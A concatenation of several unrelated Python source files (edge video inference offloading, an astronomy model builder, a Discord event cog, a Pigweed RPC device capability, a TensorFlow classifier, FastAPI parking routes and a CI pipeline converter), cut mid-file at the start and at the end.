super().__init__(*args, **kwargs)
self._work_queue = queue.Queue(maxsize=maxsize)
class Task:
def __init__(self, task_id, frame, serv_type, t_start):
self.task_id = task_id
self.frame = frame
self.serv_type = serv_type
self.t_start = t_start
self.selected_model = None
self.location = None
self.new_size = None
self.new_qp = None
def local_inference(task):
"""local inference for a video frame"""
model = edge_globals.loaded_model[task.selected_model]
if task.serv_type == edge_globals.OBJECT_DETECTION:
result = object_detection.object_detection_api(task.frame, model, threshold=0.8)
return result
if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
result = image_classification.image_classification(task.frame, model)
return result
def local_worker(task_queue):
while True:
# get a task from the queue
try:
task = task_queue.get(block=True)
edge_globals.sys_info.local_pending_task -= 1
except Exception:
average_local_delay = np.average([p.value for p in edge_globals.sys_info.local_delay])
# logger.info("average local delay:"+str(average_local_delay))
sys.exit()
else:
# locally process the task
t_start = task.t_start
result = local_inference(task)
t_end = time.time()
processing_delay = t_end - t_start
# logger.info("local_processing_delay:"+str(processing_delay))
# record the processing delay
edge_globals.sys_info.append_local_delay(t_start, processing_delay)
if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
logger.info("image classification result:"+result)
elif task.serv_type == edge_globals.OBJECT_DETECTION:
logger.info("object detection works well! please go to info_store/handled_result to check.")
edge_globals.datastore.store_image(result)
def offload_worker(task):
task = preprocess(task)
file_size = sys.getsizeof(task.frame)
# send the video frame to the server
try:
result_dict, start_time, processing_delay, arrive_transfer_server_time = \
send_frame(frame_handler, task.frame, task.selected_model)
t_end = time.time()
except Exception as err:
logger.exception("offloading error")
else:
total_processing_delay = t_end - task.t_start
# record the bandwidth and the processing delay
bandwidth = file_size / arrive_transfer_server_time
edge_globals.sys_info.append_bandwidth(task.t_start, bandwidth)
edge_globals.sys_info.append_offload_delay(task.t_start, total_processing_delay)
if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
result = result_dict["prediction"]
logger.info("offload:"+result)
elif task.serv_type == edge_globals.OBJECT_DETECTION:
frame_shape = tuple(int(s) for s in result_dict["frame_shape"][1:-1].split(","))
frame_handled = transfer_array_and_str(result_dict["result"], 'down').reshape(frame_shape)
edge_globals.datastore.store_image(frame_handled)
logger.info("cloud process image well!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Create models for *sick* """
from __future__ import division, print_function
__all__ = ("create", )
__author__ = "<NAME> <<EMAIL>>"
import cPickle as pickle
import logging
import os
import yaml
from time import strftime
import numpy as np
from astropy.io import fits
from astropy.table import Table
from sick import __version__ as sick_version
logger = logging.getLogger("sick")
def load_simple_data(filename, **kwargs):
# parse a txt/fits file with ease.
logger.debug("Opening {}".format(filename))
fits_extensions = (".fit", ".fits", ".fit.gz", ".fits.gz")
if any(map(lambda _: filename.endswith(_), fits_extensions)):
# laod as fits.
with fits.open(filename) as image:
extension_index = kwargs.pop("extension", None)
if extension_index is None:
# Get first extension with data.
for extension_index, extension in enumerate(image):
if extension.data is not None: break
else:
raise IOError("no valid data in {}".format(filename))
data = image[extension_index].data
return data
else:
return np.loadtxt(filename, **kwargs)
def create(output_prefix, grid_flux_filename, wavelength_filenames,
clobber=False, grid_flux_filename_format="csv", **kwargs):
"""
Create a new *sick* model from files describing the parameter names, fluxes,
and wavelengths.
"""
if not clobber:
# Check to make sure the output files won't exist already.
output_suffixes = (".yaml", ".pkl", "-wavelengths.memmap",
"-intensities.memmap")
for path in [output_prefix + suffix for suffix in output_suffixes]:
if os.path.exists(path):
raise IOError("output filename {} already exists".format(path))
# Read the grid_flux filename.
# param1 param2 param3 param4 channelname1 channelname2
kwds = kwargs.pop("__grid_flux_filename_kwargs", {})
kwds.update({"format": grid_flux_filename_format})
grid_flux_tbl = Table.read(grid_flux_filename, **kwds)
# Distinguish column names between parameters (real numbers) and filenames
str_columns = \
np.array([_[1].startswith("|S") for _ in grid_flux_tbl.dtype.descr])
# Check the number of channels provided.
if str_columns.sum() != len(wavelength_filenames):
raise ValueError("expected {0} wavelength filenames because {1} has {0}"
" string columns ({2}) but found {3} wavelength filenames".format(
sum(str_columns), grid_flux_filename,
", ".join(np.array(grid_flux_tbl.colnames)[str_columns]),
len(wavelength_filenames)))
# Create a record array of the grid points.
grid_points = \
grid_flux_tbl.as_array()[np.array(grid_flux_tbl.colnames)[~str_columns]]
# To-do: make sure they are all floats.
# Sort the grid points.
grid_indices = grid_points.argsort(order=grid_points.dtype.names)
grid_points = grid_points[grid_indices]
grid_flux_tbl = grid_flux_tbl[grid_indices]
# Check the wavelength filenames.
channel_wavelengths = np.array(map(load_simple_data, wavelength_filenames))
# Sort the channels by starting wavelength.
c_indices = np.argsort([each.min() for each in channel_wavelengths])
channel_names = np.array(grid_flux_tbl.colnames)[str_columns][c_indices]
channel_wavelengths = channel_wavelengths[c_indices]
channel_sizes = [len(_) for _ in channel_wavelengths]
num_pixels = sum(channel_sizes)
# Create the model YAML file.
with open(output_prefix + ".yaml", "w") as fp:
header = "\n".join([
"# Model created on {0}".format(strftime("%Y-%m-%d %H:%M:%S")),
"# Grid parameters: {0}".format(", ".join(grid_points.dtype.names)),
"# Channel names: {0}".format(", ".join(channel_names))
])
fp.write(header + "\n" + yaml.safe_dump({ "model_grid": {
"grid_points": output_prefix + ".pkl",
"intensities": output_prefix + "-intensities.memmap",
"wavelengths": output_prefix + "-wavelengths.memmap"
}}, stream=None, allow_unicode=True, default_flow_style=False))
# Create the pickled model file, with meta data.
metadata = {
"grid_flux_filename": grid_flux_filename,
"wavelength_filenames": wavelength_filenames,
"channel_names": channel_names,
"channel_sizes": channel_sizes,
"channel_resolutions": [float("inf")] * len(channel_names),
"sick_version": sick_version
}
logger.debug("Dumping grid points and metadata to file")
with open(output_prefix + ".pkl", "wb") as fp:
pickle.dump((grid_points, metadata), fp, -1)
# Create the memory-mapped dispersion file.
logger.debug("Creating memory-mapped dispersion file.")
wavelengths_memmap = np.memmap(output_prefix + "-wavelengths.memmap",
dtype="float32", mode="w+", shape=(num_pixels, ))
wavelengths_memmap[:] = np.hstack(channel_wavelengths)
wavelengths_memmap.flush()
del wavelengths_memmap
# Create the memory-mapped intensities file.
logger.debug("Creating memory-mapped intensities file.")
intensities_memmap = np.memmap(output_prefix + "-intensities.memmap",
shape=(grid_points.size, num_pixels), dtype="float32",
mode="w+")
n = len(grid_flux_tbl)
for i, row in enumerate(grid_flux_tbl):
logger.debug("Loading point {0}/{1} into the intensities map"\
.format(i + 1, n))
j = 0
for channel_name in channel_names:
try:
data = load_simple_data(row[channel_name])
except:
logger.exception("Could not load data from {0} for channel {1}"\
.format(row[channel_name], channel_name))
raise
intensities_memmap[i, j:j + data.size] = data
j += data.size
intensities_memmap.flush()
del intensities_memmap
return True
|
<filename>cogs/daymar.py
import discord # noqa
import sheets
import utility
import event
from constants import Constants
from discord.ext import commands
class Daymar(commands.Cog):
def __init__(self, client):
self.client = client
def addParticipant(self, member, memberType='Security'):
rsiCol = 0
serverCol = 2
idCol = 4
sheetData = sheets.getAllValues(daymar=True)
# Get the rsi names column.
rsiNames = [row[rsiCol] for row in sheetData]
serverNums = [row[serverCol] for row in sheetData]
memberIds = [row[idCol] for row in sheetData]
# Get available row index
try:
rowIndex = rsiNames.index('')
except ValueError:
rowIndex = len(rsiNames)
# Check if user already exists in sheet.
for index, id in enumerate(memberIds):
try:
pId = int(id)
if member.id == pId:
rowIndex = index
server = int(serverNums[index])
break
except ValueError:
server = ''
startIndex = (rowIndex, 0)
endIndex = (rowIndex, 4)
# Write values to sheet.
if member.rsiHandle is not None:
data = [member.rsiHandle, memberType, server, '', str(member.id)]
sheets.setRange(startIndex, endIndex, [data], daymar=True)
else:
data = [
member.name,
memberType,
server,
'RSI handle not verified',
str(member.id)
]
sheets.setRange(startIndex, endIndex, [data], daymar=True)
def clearParticipant(self, member):
idCol = 5
rowIndex = None
# Check if user already exists in sheet.
memberIds = sheets.getCol(idCol, daymar=True)
for index, id in enumerate(memberIds):
try:
pId = int(id)
if member.id == pId:
rowIndex = index
break
except ValueError:
pass
if rowIndex is not None:
sheets.deleteRows(rowIndex + 1, daymar=True)
def clearDaymarSheet(self):
data = sheets.getAll(daymar=True)
sheets.deleteRows(2, rowNum=len(data), daymar=True)
def checkId(ctx):
id = int(ctx.author.id)
if id in Constants.DAYMAR_ELEVATED_ACCESS_IDS:
return True
else:
return False
def can_add_participants(ctx):
return True # TODO: Make this function.
def correct_password(ctx):
return True # TODO: Make this function.
@commands.command()
async def set_rsi_handle(self, ctx, *, rsiHandle=''):
"""Sets the RSI handle of the user invoking the command.
:param rsiHandle: RSI handle
:type rsiHandle: str
example:
!eb.set_rsi_handle myRSIhandle
"""
if rsiHandle == '':
await ctx.send(
'Please specify your RSI handle by typing:\n'
f'{Constants.CMD_PREFIX}set_rsi_handle <your rsi handle> '
'without the <>'
)
return
if len(rsiHandle) < 3:
await ctx.send(
'RSI handles must be at least 3 characters long. Please enter '
'a valid RSI handle.'
)
return
if ' ' in rsiHandle:
await ctx.send(
'RSI handles cannot contain spaces. Please enter a valid '
'RSI handle.'
)
return
# Search for user in guild members
guildMembers = self.client.guildMembers.members
for m in guildMembers:
if m.id == ctx.author.id:
m.rsiHandle = rsiHandle
break
else:
m = event.GuildMember(
id=ctx.author.id,
name=ctx.author.name,
rsiHandle=rsiHandle
)
guildMembers.append(m)
guildMemberData = self.client.guildMembers.json(indent=2)
utility.saveData(Constants.GUILD_MEMBER_DATA_FILENAME, guildMemberData)
# Add to sheet if in daymar event, and participant is active.
orgEvents = self.client.orgEvents.events
for e in orgEvents:
if e.eventType == event.EventType.daymar:
p = e.getParticipant(ctx.author.id)
if p:
if p.active is True:
self.addParticipant(m)
break
await ctx.send(
f'Your RSI handle has been set to: **{rsiHandle}**\n'
'You may change your registered RSI handle name at any time by '
'running this command again.'
)
# @commands.command()
# @commands.check(can_add_participants)
@commands.command()
@commands.check(checkId)
async def get_csv(self, ctx):
fileName = 'DaymarSecurity.csv'
# TODO: Refactor this mess.
data = sheets.getAll(daymarOverview=True)
if len(data) < 2:
try:
with open(fileName, 'rb') as fp:
attachment = discord.File(fp=fp)
await ctx.author.send(
'Could not find data from active Daymar Rally. Attaching '
'last saved csv file.',
file=attachment
)
except FileNotFoundError:
await ctx.author.send('No Daymar Rally data found.')
else:
sheets.exportCsv(fileName)
with open(fileName, 'rb') as fp:
attachment = discord.File(fp=fp)
await ctx.author.send(
'Attaching latest Daymar Rally data.',
file=attachment
)
def setup(client):
client.add_cog(Daymar(client))
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Default implementation of the Pigweed RPC device common capability."""
import time
from typing import Any, Callable, Optional
from gazoo_device import decorators
from gazoo_device import errors
from gazoo_device import gdm_logger
from gazoo_device.capabilities.interfaces import pwrpc_common_base
from gazoo_device.switchboard.transports import pigweed_rpc_transport
try:
# pylint: disable=g-import-not-at-top
# pytype: disable=import-error
from device_service import device_service_pb2
# pytype: enable=import-error
except ImportError:
device_service_pb2 = None
logger = gdm_logger.get_logger()
_RPC_TIMEOUT = 10
class PwRPCCommonDefault(pwrpc_common_base.PwRPCCommonBase):
"""Pigweed RPC common capability for devices communicating over PwRPC."""
def __init__(self,
device_name: str,
switchboard_call: Callable[..., Any],
switchboard_call_expect: Callable[..., Any]):
"""Create an instance of the PwRPCCommonDefault capability.
Args:
device_name: Device name used for logging.
switchboard_call: The switchboard.call method which calls to the endpoint.
See more examples in nrf_pigweed_lighting.py.
switchboard_call_expect: The switchboard.call_and_expect method.
"""
super().__init__(device_name=device_name)
self._switchboard_call = switchboard_call
self._switchboard_call_expect = switchboard_call_expect
@decorators.DynamicProperty
def vendor_id(self) -> str:
"""The vendor id of the device."""
return self._get_static_info("vendor_id")
@decorators.DynamicProperty
def product_id(self) -> str:
"""The product id of the device."""
return self._get_static_info("product_id")
@decorators.DynamicProperty
def software_version(self) -> str:
"""The software version of the device."""
return self._get_static_info("software_version")
@decorators.CapabilityLogDecorator(logger)
def reboot(self,
no_wait: bool = False,
rpc_timeout_s: int = _RPC_TIMEOUT,
bootup_logline_regex: Optional[str] = None,
bootup_timeout: Optional[int] = None):
"""Reboots the device.
Args:
no_wait: Return before reboot completes.
rpc_timeout_s: Timeout (s) for RPC call.
bootup_logline_regex: Device logline indicating booting up, not applicable
if no_wait is True.
bootup_timeout: Timeout (s) to wait for the bootup message, not applicable
if no_wait is True.
"""
if no_wait:
self._trigger_device_action(action="Reboot",
rpc_timeout_s=rpc_timeout_s)
else:
self._trigger_device_action(action="Reboot",
rpc_timeout_s=rpc_timeout_s,
expect_regex=bootup_logline_regex,
expect_timeout_s=bootup_timeout)
self._wait_for_bootup_complete(bootup_timeout)
@decorators.CapabilityLogDecorator(logger)
def factory_reset(self,
no_wait: bool = False,
rpc_timeout_s: int = _RPC_TIMEOUT,
bootup_logline_regex: Optional[str] = None,
bootup_timeout: Optional[int] = None):
"""Factory resets the device.
Args:
no_wait: Return before factory-reset completes.
rpc_timeout_s: Timeout (s) for RPC call.
bootup_logline_regex: Device logline indicating booting up, not applicable
if no_wait is True.
bootup_timeout: Timeout (s) to wait for the bootup message, not applicable
if no_wait is True.
"""
if no_wait:
self._trigger_device_action(action="FactoryReset",
rpc_timeout_s=rpc_timeout_s)
else:
self._trigger_device_action(action="FactoryReset",
rpc_timeout_s=rpc_timeout_s,
expect_regex=bootup_logline_regex,
expect_timeout_s=bootup_timeout)
self._wait_for_bootup_complete(bootup_timeout)
@decorators.CapabilityLogDecorator(logger)
def ota(self):
"""Triggers OTA to the device."""
self._trigger_device_action("TriggerOta")
def _get_static_info(self, property_name: str) -> str:
"""Returns device static information.
Args:
property_name: Static property name which currently supports: vendor_id,
product_id and software_version.
Raises:
DeviceError: The ack status is not true or an invalid property_name is
given.
"""
ack, payload_in_bytes = self._switchboard_call(
method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
method_args=("Device", "GetDeviceInfo"),
method_kwargs={})
if not ack:
raise errors.DeviceError("{} getting static info failed.".format(
self._device_name))
payload = device_service_pb2.DeviceInfo.FromString(payload_in_bytes)
device_property = getattr(payload, property_name, None)
if device_property is None:
raise errors.DeviceError(f"{property_name} doesn't exist in static info.")
return device_property
def _trigger_device_action(
self,
action: str,
rpc_timeout_s: int = _RPC_TIMEOUT,
expect_regex: Optional[str] = None,
expect_timeout_s: Optional[int] = None) -> None:
"""Triggers specific device action.
Args:
action: Device actions including reboot, factory-reset and OTA.
rpc_timeout_s: Timeout (s) for RPC call.
expect_regex: Expected device logline regex.
expect_timeout_s: Timeout (s) to wait for the expected regex.
Raises:
DeviceError: The ack status is not true.
"""
if expect_regex is None and expect_timeout_s is None:
ack, _ = self._switchboard_call(
method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
method_args=("Device", action),
method_kwargs={"pw_rpc_timeout_s": rpc_timeout_s})
elif expect_regex is not None and expect_timeout_s is not None:
_, (ack, _) = self._switchboard_call_expect(
method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
pattern_list=[expect_regex],
timeout=expect_timeout_s,
method_args=("Device", action),
method_kwargs={"pw_rpc_timeout_s": rpc_timeout_s},
raise_for_timeout=True)
else:
raise ValueError("Only one of \"expect_regex\", \"expect_timeout_s\" "
"arguments was provided. Both or neither should be "
"provided.")
if not ack:
raise errors.DeviceError("{} triggering {} failed: The action did not"
" succeed".format(self._device_name, action))
def _wait_for_bootup_complete(self, bootup_timeout: int):
"""Waits for device to boot up.
Args:
bootup_timeout: Max time to wait for bootup to complete (in seconds).
Raises:
DeviceError: If device did not boot up successfully in given timeout.
"""
start_time = time.time()
bootup_time = start_time + bootup_timeout
while time.time() < bootup_time:
try:
logger.debug("{} responded to the RPC call: {}".
format(self._device_name, self.software_version))
logger.info("{} booted up in {}s".
format(self._device_name, time.time() - start_time))
return
except errors.DeviceError:
logger.debug("{} hasn't booted up yet.".format(self._device_name))
time.sleep(0.5)
raise errors.DeviceError(f"Failed to boot up within {bootup_timeout}s.")
|
import tensorflow as tf
from sklearn.metrics import confusion_matrix
import numpy as np
import load
train_samples, train_labels = load._train_samples, load._train_labels
test_samples, test_labels = load._test_samples, load._test_labels
print('Training set', train_samples.shape, train_labels.shape)
print(' Test set', test_samples.shape, test_labels.shape)
image_size = load.image_size
num_labels = load.num_labels
num_channels = load.num_channels
def get_chunk(samples, labels, chunkSize):
"""
Iterator/Generator: get a batch of data
这个函数是一个迭代器/生成器,用于每一次只得到 chunkSize 这么多的数据
用于 for loop, just like range() function
"""
if len(samples) != len(labels):
raise Exception('Length of samples and labels must equal')
stepStart = 0 # initial step
i = 0
while stepStart < len(samples):
stepEnd = stepStart + chunkSize
if stepEnd < len(samples):
yield i, samples[stepStart:stepEnd], labels[stepStart:stepEnd]
i += 1
stepStart = stepEnd
class Network():
def __init__(self, num_hidden, batch_size):
"""
@num_hidden: 隐藏层的节点数量
@batch_size:因为我们要节省内存,所以分批处理数据。每一批的数据量。
"""
self.batch_size = batch_size
self.test_batch_size = 500
# Hyper Parameters
self.num_hidden = num_hidden
# Graph Related
self.graph = tf.Graph()
self.tf_train_samples = None
self.tf_train_labels = None
self.tf_test_samples = None
self.tf_test_labels = None
self.tf_test_prediction = None
def define_graph(self):
"""
定义我的的计算图谱
"""
with self.graph.as_default():
# 这里只是定义图谱中的各种变量
self.tf_train_samples = tf.placeholder(
tf.float32, shape=(self.batch_size, image_size, image_size, num_channels)
)
self.tf_train_labels = tf.placeholder(
tf.float32, shape=(self.batch_size, num_labels)
)
self.tf_test_samples = tf.placeholder(
tf.float32, shape=(self.test_batch_size, image_size, image_size, num_channels)
)
# fully connected layer 1, fully connected
fc1_weights = tf.Variable(
tf.truncated_normal([image_size * image_size * num_channels, self.num_hidden], stddev=0.1)
)
fc1_biases = tf.Variable(tf.constant(0.1, shape=[self.num_hidden]))
# fully connected layer 2 --> output layer
fc2_weights = tf.Variable(
tf.truncated_normal([self.num_hidden, num_labels], stddev=0.1)
)
fc2_biases = tf.Variable(tf.constant(0.1, shape=[num_labels]))
# 想在来定义图谱的运算
def model(data):
# fully connected layer 1
shape = data.get_shape().as_list()
print(data.get_shape(), shape)
reshape = tf.reshape(data, [shape[0], shape[1] * shape[2] * shape[3]])
print(reshape.get_shape(), fc1_weights.get_shape(), fc1_biases.get_shape())
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# fully connected layer 2
return tf.matmul(hidden, fc2_weights) + fc2_biases
# Training computation.
logits = model(self.tf_train_samples)
self.loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=self.tf_train_labels)
)
# print(self.loss)
# Optimizer.
self.optimizer = tf.train.GradientDescentOptimizer(0.01).minimize(self.loss)
# Predictions for the training, validation, and test data.
self.train_prediction = tf.nn.softmax(logits)
self.test_prediction = tf.nn.softmax(model(self.tf_test_samples))
def run(self):
"""
用到Session
"""
# private function
def print_confusion_matrix(confusionMatrix):
print('Confusion Matrix:')
for i, line in enumerate(confusionMatrix):
print(line, line[i] / np.sum(line))
a = 0
for i, column in enumerate(np.transpose(confusionMatrix, (1, 0))):
a += (column[i] / np.sum(column)) * (np.sum(column) / 26000)
print(column[i] / np.sum(column), )
print('\n', np.sum(confusionMatrix), a)
self.session = tf.Session(graph=self.graph)
with self.session as session:
tf.global_variables_initializer().run()
### 训练
print('Start Training')
# batch 1000
for i, samples, labels in get_chunk(train_samples, train_labels, chunkSize=self.batch_size):
_, l, predictions = session.run(
[self.optimizer, self.loss, self.train_prediction],
feed_dict={self.tf_train_samples: samples, self.tf_train_labels: labels}
)
print("loss is :", l)
# labels is True Labels
accuracy, _ = self.accuracy(predictions, labels)
if i % 50 == 0:
print('Minibatch loss at step %d: %f' % (i, l))
print('Minibatch accuracy: %.1f%%' % accuracy)
###
### 测试
print('Start Testing')
accuracies = []
confusionMatrices = []
for i, samples, labels in get_chunk(test_samples, test_labels, chunkSize=self.test_batch_size):
result = self.test_prediction.eval(feed_dict={self.tf_test_samples: samples})
accuracy, cm = self.accuracy(result, labels, need_confusion_matrix=True)
accuracies.append(accuracy)
confusionMatrices.append(cm)
print('Test Accuracy: %.1f%%' % accuracy)
print(' Average Accuracy:', np.average(accuracies))
print('Standard Deviation:', np.std(accuracies))
print_confusion_matrix(np.add.reduce(confusionMatrices))
###
def accuracy(self, predictions, labels, need_confusion_matrix=False):
"""
计算预测的正确率与召回率
@return: accuracy and confusionMatrix as a tuple
"""
_predictions = np.argmax(predictions, 1)
_labels = np.argmax(labels, 1)
cm = confusion_matrix(_labels, _predictions) if need_confusion_matrix else None
# == is overloaded for numpy array
accuracy = (100.0 * np.sum(_predictions == _labels) / predictions.shape[0])
return accuracy, cm
if __name__ == '__main__':
net = Network(num_hidden=128, batch_size=100)
net.define_graph()
net.run()
|
<filename>backend/parky/routes.py
from datetime import datetime
from typing import Optional
from fastapi import Depends, Header, HTTPException, Response
from pydantic import BaseModel
from sqlalchemy.orm import Session
from parky.database import ParkingLot, User, get_db
from parky.services import ParkingLotService, UserService, V2DRelayService, VehicleService
from parky.utils import get_logger
logger = get_logger("RouteHandler")
# Middleware Utils
def _auth_check(authorization: str) -> Optional[str]:
"""
Check authorization header and retrieve session data.
:param authorization: HTTP ``Authorization`` header
:returns: User ID if succeed, else None
.. note::
``Authorization:`` header should be Bearer form:
* ``Authorization: Bearer TOKENTOKENTOKEN``
"""
method, token = authorization.strip().split(" ")
if method != "Bearer":
logger.error("Authorization method is not Bearer")
return None
user_service = UserService.instance()
try:
result = user_service.check_session(token)
except:
raise ValueError("Failed to retrieve user information")
return None
return result
# Handlers
async def handle_status():
return {"status": "OK", "timestamp": datetime.now()}
class SignupRequest(BaseModel):
name: str
ssn: str
user_id: str
password: str
public_key: str
async def handle_signup(signup_request: SignupRequest, db: Session = Depends(get_db)):
response = UserService.add_user(
db=db,
name=signup_request.name,
ssn=signup_request.ssn,
user_id=signup_request.user_id,
password=<PASSWORD>,
public_key=signup_request.public_key,
)
if not response:
raise HTTPException(status_code=500, detail=f"Already used user_id {signup_request.user_id}")
return {"message": f"User {signup_request.user_id} is signed up."}
class SigninRequest(BaseModel):
user_id: str
password: str
async def handle_signin(signin_request: SigninRequest, db: Session = Depends(get_db)):
user_service = UserService.instance()
try:
token = await user_service.signin(
db=db,
user_id=signin_request.user_id,
password=signin_request.password,
)
except ValueError:
raise HTTPException(status_code=401, detail=f"not existed user {signin_request.user_id} tried to sign in.")
return {"status": True, "token": token}
async def handle_get_vehicles(response: Response, authorization: str = Header(None)):
if _auth_check(authorization) is None:
raise HTTPException(status_code=401, detail="Not authorized")
vehicle_service = VehicleService.instance()
result = vehicle_service.get_vehicles()
if result is None or len(result) == 0:
response.status_code = 404
return {"reason": "No vehicle was registered"}
return result
async def handle_find_vehicle(response: Response, number: str, authorization: str = Header(None)):
if _auth_check(authorization) is None:
raise HTTPException(status_code=401, detail="Not authorized")
vehicle_service = VehicleService.instance()
result = vehicle_service.find_vehicle_by_number(number)
if result is None:
response.status_code = 404
return {"reason": "Requested vehicle is not found"}
return result
class RegisterVehicleRequest(BaseModel):
number: str
public_key: str
signature: str
async def handle_register_vehicle(data: RegisterVehicleRequest, response: Response):
vehicle_service = VehicleService.instance()
result = vehicle_service.register_vehicle(data.number, data.public_key, data.signature)
if result != 0:
response.status_code = 400
return {"reason": "Registering vehicle is failed"}
response.status_code = 200
return {"ok": True}
async def handle_start_session(uid: str, vid: str):
v2d_relay_service = V2DRelayService()
try:
token, public_key = v2d_relay_service.start_session(uid, vid)
except ValueError:
raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
return {"token": token, "public_key": public_key}
class AuthVehicleRequest(BaseModel):
vid: str
token: str
async def handle_auth_vehicle(data: AuthVehicleRequest):
v2d_relay_service = V2DRelayService()
try:
token, public_key = v2d_relay_service.auth_vehicle(data.vid, data.token)
except ValueError:
raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
return {"token": token, "public_key": public_key}
class AuthClientRequest(BaseModel):
uid: str
token: str
async def handle_auth_client(data: AuthClientRequest):
v2d_relay_service = V2DRelayService()
try:
v2d_relay_service.auth_client(data.uid, data.token)
except ValueError:
raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
return {"status": True}
async def handle_get_all_parking_lot(db: Session = Depends(get_db)):
parking_lots = ParkingLotService.get_all_lots(db)
return {"parking_lots": parking_lots}
async def handle_income_car(parking_id: int, vehicle_number: str, db: Session = Depends(get_db)):
parking_service = ParkingLotService()
parking_number = parking_service.income_car(db, parking_id, vehicle_number)
return {"parking_number": parking_number}
async def handle_go_out_car(vehicle_number: str, db: Session = Depends(get_db)):
parking_service = ParkingLotService()
status = parking_service.go_out_car(db, vehicle_number)
if status == 0:
raise HTTPException(status_code=404, detail="Vehicle not found by given ids")
return {"status": True}
async def handle_reserve(parking_id: int, user_id: str, db: Session = Depends(get_db)):
parking_service = ParkingLotService()
status = parking_service.reserve(db, parking_id, user_id)
if status == 0:
raise HTTPException(status_code=404, detail="already reserved user")
return {"status": True}
|
#!/usr/bin/env python3
### IMPORTS ###
import logging
import uuid
import os
import sys
from string import Template
import yaml
from classic import StepTypeNotSupported
from .eventsource import EventSource
from .sensor import Sensor
from .ingress import Ingress
from .workflow_template import WorkflowTemplate
### GLOBALS ###
### FUNCTIONS ###
def convert_condition_into_depends_string(cond):
'''Transform the string for the when V1 clause into a V2 depends step.state'''
condition_conversion = {
"success": ["Succeeded"],
"failure": ["Errored"],
"finished": ["Succeeded", "Errored"],
"skipped": ["Skipped"]
}
str = " && ("
counter= 0
for c in condition_conversion[cond.state]:
if counter != 0:
str += "|| "
str += '%s.%s' % (cond.step_name, c)
counter += 1
str += ")"
return str
def create_plugin_task_block(plugin, previous):
'''Create a block of Yaml in a dag to call a plugin'''
logging.info("Create workflow template block for %s", plugin.name)
block = {
"name": plugin.name,
"continueOn": {"failed":not bool(plugin.fail_fast)},
"templateRef": {
"name": f"c2csdp.{plugin.plugin_name}.{plugin.plugin_version}",
"template": plugin.plugin_name
},
"arguments": {
"parameters": []
}
}
for x in plugin.parameters:
block['arguments']['parameters'].append(
{
"name": x.name,
"value": x.value
}
)
if previous:
block['depends']=previous
if plugin.conditions:
logging.debug("Processing conditions")
for x in plugin.conditions:
block['depends'] += convert_condition_into_depends_string(x)
else:
logging.debug("NO conditions")
return block
### CLASSES ###
class Csdp:
"""Class related to Codefresh Classic operations and data"""
def __init__(self, v1, ingress_url, volume_size):
self.logger = logging.getLogger(type(self).__name__)
self.uuid=str(uuid.uuid1())
self.ingress_url=ingress_url
self.project = v1.project
self.name = v1.name
self.volume_size = volume_size
self.event_source = EventSource(name=v1.name, project=v1.project,
provider="github", uuid=self.uuid)
self.sensor = Sensor(v1.project, v1.name, "github", self.uuid, self.volume_size)
self.workflow_template = WorkflowTemplate(v1.project, v1.name)
self.ingress = Ingress(v1.project)
def save(self):
'''Save the whole CSDP object to disk in the project folder'''
os.makedirs(self.project, exist_ok=True)
self.event_source.save(self.project, self.name)
self.sensor.save(self.project, self.name)
self.workflow_template.save(self.project, self.name)
self.ingress.save(self.project)
def convert_trigger(self, trig):
'''convert the trigger and add it to the EventSource block'''
(owner,repo_name) = trig.repo.split('/')
self.logger.info("Convert Trigger %s", self.name)
yaml_filename = "./manifests/eventBlock.template.yaml"
with open(yaml_filename, mode='r', encoding='UTF-8') as file:
contents = file.read()
template = Template(contents)
values = {
'event': trig.events,
'owner': owner,
'repo_name': repo_name,
'name': self.name,
'project': self.project,
'provider': trig.provider,
'uuid': self.uuid,
'ingress_url': self.ingress_url
}
event_yaml=template.substitute(values)
self.event_source.manifest['spec'][trig.provider]=yaml.safe_load(event_yaml)
block = {
"path": f"/webhooks/{self.project}/{self.name}/{trig.provider}-{self.uuid}",
"backend": {
"service": {
"name": f"{self.name}-eventsource-svc",
"port": {
"number": 80
}
}
},
"pathType": "ImplementationSpecific"
}
self.ingress.manifest['spec']['rules'][0]['http']['paths'].append(block)
#
# Step is converted into:
# - a template in the workflow template
# - a call in the "pipeline" workflow
def convert_step(self, step, previous_step = None):
'''Convert a V1 step into a task'''
self.logger.info("Converting step %s (%s)", step.name, step.type)
if step.type == "plugins":
template_block=create_plugin_task_block(step, previous_step)
self.workflow_template.manifest['spec']['templates'][0]['dag']['tasks'].append(template_block)
else:
raise StepTypeNotSupported(step.type)
def convert_variable(self, var, provider, uuid):
'''Variable is added to the sensor (input to argoWorkflow)
parameters (match payload to input param)
'''
self.sensor.manifest['spec']['triggers'][0]['template']['argoWorkflow']['source']['resource']['spec']['arguments']['parameters'].append(
{"name": var.name, "value": var.value}
)
if var.source == 'pipeline':
self.workflow_template.manifest['spec']['templates'][0]['inputs']['parameters'].append(
{"name": var.name, "value": var.value}
)
else:
self.workflow_template.manifest['spec']['templates'][0]['inputs']['parameters'].append(
{"name": var.name}
)
self.sensor.manifest['spec']['triggers'][0]['template']['argoWorkflow']['parameters'].append(
{
"dest": f"spec.arguments.parameters.{var.order}.value",
"src": {
"dependencyName": f"{provider}-{uuid}",
"dataTemplate": var.path
}
}
)
#
# Add secret volumes to workflow template
# Like in case of kaniko build for example
def add_secret_volume(self, volume):
'Add mount for secret volume - aka docker secrets for kaniko'
self.workflow_template.manifest['spec']['volumes'].append(
{
"name": volume,
"secret": {
"secretName": volume,
"items": [
{
"key": ".dockerconfigjson",
"path": "config.json"
}
]
}
}
)
### Setters and getters
@property
def workflow_template(self):
